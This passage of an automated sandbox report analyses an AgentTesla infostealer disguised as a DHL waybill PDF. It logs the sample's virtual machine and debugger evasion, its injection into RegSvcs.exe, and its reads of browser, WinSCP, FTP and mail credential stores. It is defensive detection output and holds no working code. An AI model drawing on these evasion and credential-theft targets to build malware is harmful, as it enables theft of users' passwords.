                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 8340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 7C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 9340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: A340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797110Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeWindow / User API: threadDelayed 1444Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7608Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2227Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 3660Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 5808Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 4708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98034Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97811Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97690Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1799094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1798110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1797110Jump to behavior
                      Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: RegSvcs.exe, 00000003.00000002.4520028530.0000000006552000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                      Source: RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F370B8 CheckRemoteDebuggerPresent,3_2_02F370B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
